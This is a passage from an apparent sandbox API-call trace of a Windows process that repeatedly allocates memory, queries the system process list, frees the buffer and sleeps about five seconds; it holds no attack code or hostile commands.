BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.813] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.827] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.842] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.862] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.874] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.890] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.921] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.941] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.952] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.968] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0139.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0139.986] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0139.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0139.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0139.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0139.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0139.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.014] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.030] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.046] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.062] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.077] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.116] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.124] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.141] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 